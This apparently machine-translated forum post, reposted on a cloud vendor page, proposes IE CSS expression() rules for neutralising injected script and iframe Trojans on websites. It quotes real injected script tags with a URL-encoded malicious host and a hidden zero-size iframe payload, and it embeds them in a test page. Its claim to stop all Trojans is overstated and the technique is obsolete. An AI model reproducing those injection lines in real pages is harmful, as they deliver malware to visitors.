Use two lines of code to solve all the Web Trojan horse (including Iframe/script Trojan)

Source: Internet
Author: User
Tags contains copy expression access
or hanging the horse problem, this period of time, I gradually feel the pressure, the first big, through QQ or MSN Plus my people more and more, I recently my work has been busy. Hey, think about it, still need time to help everyone.

Not long ago, "http://bbs.blueidea.com/thread-2818052-1-1.html line of code to solve the IFRAME hanging horse (including server injection, client ARP injection, etc.)" has been recognized by many friends, it is really a good way to avoid wind and rain. But now the way of hanging the horse is really as I expected to change, now popular Hang <script> Trojan, Khan, see a few users of the site has been this-the top of the page or the bottom plus:

Note that the following address contains Trojans, please do not easily access:

[Copy to Clipboard] [ - ] CODE: <script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
Khan died, inserted in a row n the same <script> mark. What's My computer? It's all patched up., direct access to this http://%76%63%63%64%2E%63%6E (or direct use of the Thunderbolt download), the amount ~ in the sky:

[Copy to Clipboard] [ - ] CODE:document.write ("<div style= ' Display:none ' >")
document.write ("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write ("</div>")
And with the Thunder download http://a.158dm.com/b1.htm this file, a look, a mess of JS code, Khan, but found a similar number of QQ number, directly Gaga look, Khan, and then professional to provide Nets horse organization, hey, what the world. The charge is quite high drop!

[Copy to Clipboard] [ - ] CODE: ...
var kfqq, qqs= " 784378237"; Qwfgsg= "LLLL\\XXXXXLD"; KFQQ = Qqs;
(... (There are also the following n-Statistic JS code).
In view of the above situation, I also can not look in vain, think of ways, brother. Drink a bowl of mung bean porridge, sugar put quite a lot of, good drink. Way to think of it. A little analysis will come to the answer. Let's look at the characteristics of the,<script> Trojan:

<script src= http://%76%63%63%64%2e%63%6e></script>

Yes, the script of the SRC is generally in Outland, that is, SRC is the beginning of HTTP, if it is the script of their own site generally do not need to add HTTP; Look at the prototype of the Trojan, inside or output of the IFRAME, JS code or other <object> Code, no matter how much, how many to kill.

To write CSS with me, one by one to get them, I wrote 5 different programs, we have to test ha:

Solution 1:

[Copy to Clipboard] [ - ] Code:iframe{n1ifm:expression (this.src= ' About:blank ', this.outerhtml= ');} * * This line of code is to solve the problem of an IFRAME!
Script{nojs1:expression (This.src.toLowerCase (). IndexOf (' http ') ==0)? document.write (' Trojan is successfully quarantined! '): '}
Principle: The <script> mark of src out into lowercase, and then see is not the "HTTP" beginning of the Outland JS script file, if it is, the page content empty and write "Trojan was successfully isolated!". otherwise normal display.
Disadvantage: Visitors cannot see the pages infected with the <script> Trojan.


Solution 2:

[Copy to Clipboard] [ - ] Code:iframe{nifm2:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{no2js:expression (This.src.toLowerCase (). IndexOf (' http ') ==0) document.close (): "");
Principle: The document.write () of the JS file in Outland is forced off by using Document.close (). The Trojan has not yet finished writing, only part of the forced cache output, the rest will not be written again.


Solution 3:

[Copy to Clipboard] [ - ] Code:iframe{ni3fm:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{n3ojs:expression (This.src.toLowerCase (). IndexOf (' http ') ==0)? Document.execcommand (' Stop '): ');
Principle: The same to the JS file in Outland, immediately call IE private ExecCommand method to stop all requests on the page, so the next JS file is also forced to stop downloading. Just like we clicked the "Stop" button on the browser. It seems that this is JS analog IE stop button a method.

Solution 4:

[Copy to Clipboard] [ - ] Code:iframe{nif4m:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{noj4s:expression (if (this.src.indexOf (' http ') ==0) this.src= ' res://ieframe.dll/dnserror.htm ');
Principle: The JS file in the IE404 of SRC rewrite cost to the address of the wrong page, so that the JS code in Outland will not be downloaded.

Solution 5:

[Copy to Clipboard] [ - ] Code:iframe{nifm5:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{noj5s:expression (This.id.toLowerCase (). IndexOf (' LH ') ==0)? document.write (' Trojan is successfully quarantined! '): ')}
The fifth Scenario's page HTML source <script> include an ID prefixed with "LH", such as Lhweatherjsapi,<script src= "***/**.js" id= "Lhsearchjsapi" > </script>

The following page code contains a Trojan address, and the Trojan in the page repeated 6 times, we use the above different programs to test, see my research how! (This test has a certain risk, please make sure that all the patches and test)

[Copy to Clipboard] [ - ] CODE: <! DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 transitional//en" "Http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd ">
<meta http-equiv= "Content-type" content= "text/html; Charset=utf-8 "/>
<title> let the process of JS Trojan quickly stop the CSS code </title>
<style type= "Text/css" id= "Linrstudio" >
/*<! [cdata[*/
Iframe{nhk1:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{ngz1:expression ((this.src.indexOf (' http ') ==0)? Document.close (): ');
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm * *
/*]]>*/
</style>
<body>
<script type= "Text/javascript" src= "1.js" ></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src= "Http://%76%63%63%64%2E%63%6E" type= "Text/javascript" ></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
I am 1 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
I am 2 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
I am 3 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
</body>
1.js of which is their own site:

[Copy to Clipboard] [ - ] CODE:document.write ("I am the JS file of this site");
document.write ("My test environment is:
Windows XP SP2 and Windows Vista SP1
Ie6/ie7/ie8
Have all been patched.
To sum up, all the current way of hanging horse all cracked, with CSS can solve all the Trojan problem, visitors will not be easily poisoned.

We also need to study carefully to see what my code bugs, and some words must be brought out to discuss, to solve the problem! Or you have a better way of talking about it.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.